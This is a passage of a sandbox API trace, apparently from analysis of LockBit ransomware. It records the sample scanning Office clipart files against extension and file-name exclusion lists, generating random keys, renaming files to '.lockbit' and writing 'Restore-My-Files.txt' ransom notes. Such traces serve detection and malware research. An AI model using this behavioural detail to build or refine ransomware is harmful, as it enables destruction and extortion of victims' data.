lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.194] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02092_.WMF") returned 1 [0163.195] lstrcmpiW (lpString1="ntldr", lpString2="NA02092_.WMF") returned 1 [0163.195] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02092_.WMF") returned 1 [0163.195] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02092_.WMF") returned -1 [0163.195] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02092_.WMF") returned -1 [0163.195] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02092_.WMF") returned 1 [0163.195] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02092_.WMF") returned -1 [0163.195] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.195] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF") returned=".WMF" [0163.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.195] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.195] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.196] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.196] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF.lockbit") returned 72 [0163.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02092_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0163.197] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.197] malloc (_Size=0x40068) returned 0x3df0008 [0163.197] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1644) returned 1 [0163.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0163.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0163.199] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0163.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.348] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.348] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.350] free (_Block=0x1fa2ed8) [0163.350] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.350] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.350] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.350] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x308e2500, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x308e2500, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02093_.WMF", cAlternateFileName="")) returned 1 [0163.350] lstrcmpiW (lpString1=".", lpString2="NA02093_.WMF") returned -1 [0163.528] lstrcmpiW (lpString1="..", lpString2="NA02093_.WMF") returned -1 [0163.651] PathFindExtensionW (pszPath="NA02093_.WMF") returned=".WMF" [0163.651] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.651] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.652] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.652] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02093_.WMF") returned 1 [0163.652] lstrcmpiW (lpString1="ntldr", lpString2="NA02093_.WMF") returned 1 [0163.652] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02093_.WMF") returned 1 [0163.652] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02093_.WMF") returned -1 [0163.653] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02093_.WMF") returned -1 [0163.653] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02093_.WMF") returned 1 [0163.653] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02093_.WMF") returned -1 [0163.653] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.653] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF") returned=".WMF" [0163.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.653] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.653] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.654] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.654] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF.lockbit") returned 72 [0163.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02093_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0163.655] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.655] malloc (_Size=0x40068) returned 0x1ff1e60 [0163.655] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=672) returned 1 [0163.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0163.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0163.657] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0163.658] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.658] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.658] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.666] free (_Block=0x1fa2ed8) [0163.666] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.666] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.666] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29651800, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x29651800, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x1fe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02124_.WMF", cAlternateFileName="")) returned 1 [0163.666] lstrcmpiW (lpString1=".", lpString2="NA02124_.WMF") returned -1 [0163.666] lstrcmpiW (lpString1="..", lpString2="NA02124_.WMF") returned -1 [0163.666] PathFindExtensionW (pszPath="NA02124_.WMF") returned=".WMF" [0163.666] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.666] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.667] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.667] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.668] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02124_.WMF") returned 1 [0163.668] lstrcmpiW (lpString1="ntldr", lpString2="NA02124_.WMF") returned 1 [0163.668] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02124_.WMF") returned 1 [0163.668] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02124_.WMF") returned -1 [0163.668] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02124_.WMF") returned -1 [0163.668] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02124_.WMF") returned 1 [0163.669] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02124_.WMF") returned -1 [0163.669] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.669] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF") returned=".WMF" [0163.669] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.669] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.669] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.670] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.670] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF.lockbit") returned 72 [0163.670] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF" (normalized: "c:\\program 